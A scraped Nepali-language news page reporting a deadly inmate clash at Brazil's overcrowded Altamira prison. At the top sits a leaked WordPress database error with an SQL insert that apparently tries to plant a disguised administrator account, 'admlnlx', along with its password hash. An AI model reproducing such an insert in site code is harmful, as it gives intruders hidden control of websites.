WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEIITwgYGntb1Sw66JBkkGp1oNjk6R/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-17 09:27:09', '', 'admlnlx', 'admlnlx')

ब्राजिलको अल्टामिरा जेलमा कैदीहरुबीच झडप, ५२ जनाको मृत्यु – Gaule Khabar

ब्राजिलको अल्टामिरा जेलमा कैदीहरुबीच झडप, ५२ जनाको मृत्यु

ब्राजिलको अल्टामिरा जेलमा कैदीहरुबीच झडप, ५२ जनाको मृत्यु

गाउँले न्युज, १४ साउन, काठमाडौं । ब्राजिलको पारा राज्यको एक जेलमा रहेको कैदी बन्दीबीच झडप हुँदा ५२ जनाको मृत्यु भएको  छ ।
अधिकारीका अनुसार स्थानीय समय बिहान ७ बजेबाट सुरु भएको झडप मध्याह्नमात्र नियन्त्रणमा लिइएको थियो । जेलमा करिब पाँच घण्टासम्म झडप भएको थियो ।

स्थानीय मिडियाहरुका अनुसार जेलको एकातर्फ रहेका कैदीहरु अर्कोतर्फ बसेका कैदीहरुको समूहमा पुगेपछि सुरु भएको विवादले झडपको रुप लिएको हो ।

कैदीबन्दीहरुले जेलका दुई अधिकारीलाई बन्धक पनि बनाएका थिए । यद्यपि उनीहरुलाई कैदीको नियन्त्रणबाट मुक्त गराइसकिएको छ ।

झडपको क्रममा जेलभित्रै आगो लगाइएको थियो र धुँवाको कारण श्वासप्रस्वासमा समस्या आएर पनि केहीको मृत्यु भएको बताइएको छ । ब्राजिलका टेलिभिजनहरुले जेलको भवनबाट धुँवा निस्किरहेको र केही कैदीहरु जेलको छतमाथि हिँडडुल गरिरहेको दृष्य प्रसारण गरेका छन् ।

ब्राजिलका सञ्चारमाध्यमहरुका अनुसार अल्टामिरा जेलको क्षमता २ सय रहे पनि ३ सय ११ जना कैदीलाई राखिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका